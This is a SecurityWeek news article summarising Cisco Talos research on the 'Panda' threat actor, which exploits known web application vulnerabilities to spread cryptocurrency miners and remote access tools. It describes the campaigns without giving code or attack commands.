Security Experts:

Connect with us

Hi, what are you looking for?



‘Panda’ Group Makes Thousands of Dollars Using RATs, Crypto-Miners

A new threat actor has generated thousands of dollars in the Monero cryptocurrency using remote access tools (RATs) and illicit cryptocurrency mining malware, Cisco’s Talos threat intelligence and research group revealed on Tuesday.

A new threat actor has generated thousands of dollars in the Monero cryptocurrency using remote access tools (RATs) and illicit cryptocurrency mining malware, Cisco’s Talos threat intelligence and research group revealed on Tuesday.

Although not highly sophisticated, the actor, which Talos refers to as Panda, is highly active, focused on persistently exploiting vulnerable web applications worldwide. The actor’s tools allow it to traverse networks, while the use of RATs also puts organizations at risk of data theft.

The group is capable of updating its infrastructure and exploits on the fly and relies on exploits released by Shadow Brokers for infiltration, as well as the open-source credential-dumping application Mimikatz.

Initially associated with last year’s MassMiner campaign, the threat actor was shortly after linked to another widespread mining campaign that used a different set of command and control (C&C) servers. Panda has since updated not only the infrastructure, but also its portfolio of exploits and payloads.

The cybercriminals, Talos’ security researchers say, have been observed targeting organizations in multiple industries, including those in the banking, healthcare, transportation, telecommunications, and IT services sectors.

In July 2018, the actor was exploiting a WebLogic vulnerability (CVE-2017-10271) to drop a miner associated with MassMiner. The hackers were mass-scanning for vulnerable servers and also attempted to exploit an Apache Struts 2 vulnerability (CVE-2017-5638). A PowerShell exploit was used to download a miner payload.

“In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000,” Talos says.

Panda was also observed using Gh0st RAT and dropping other hacking tools and exploits, including Mimikatz and exploits that the Shadow Brokers are said to have stolen from the National Security Agency (NSA).

Talos researchers spotted elements of the MassMiner attacks being used in a campaign that employed a different C&C server, suggesting that the same actor might have been behind both.

In January 2019, the threat actor was exploiting a flaw in the ThinkPHP web framework (CNVD-2018-24942) to spread similar malware. In March 2019, it was using new infrastructure, although the tactics, techniques, and procedures (TTPs) remained similar.

Soon after, Panda started employing an updated payload, which used the Certutil tool in Windows to download the secondary miner payload. Exploit modules designed for lateral movement were still used, many related to the NSA exploits.

Over the past month, Panda has updated its C&C and payload-hosting infrastructure, but the employed malware remains relatively similar to what was used in May 2019. In August, the hackers added another set of domains to their inventory, the researchers say.

“Panda’s operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated,” Talos concludes.

Related: MassMiner Attacks Web Servers With Multiple Exploits

Related: Stealthy Crypto-Miner Has Worm-Like Spreading Mechanism

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Expert Insights

Related Content


Zendesk is informing customers about a data breach that started with an SMS phishing campaign targeting the company’s employees.


The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.

Malware & Threats

Microsoft plans to improve the protection of Office users by blocking XLL add-ins from the internet.


Artificial intelligence is competing in another endeavor once limited to humans — creating propaganda and disinformation.


Video games developer Riot Games says source code was stolen from its development environment in a ransomware attack


A digital ad fraud scheme dubbed "VastFlux" spoofed over 1,700 apps and peaked at 12 billion ad requests per day before being shut down.


A new study by McAfee and the Center for Strategic and International Studies (CSIS) named a staggering figure as the true annual cost of...


Cybercriminals earned significantly less from ransomware attacks in 2022 compared to 2021 as victims are increasingly refusing to pay ransom demands.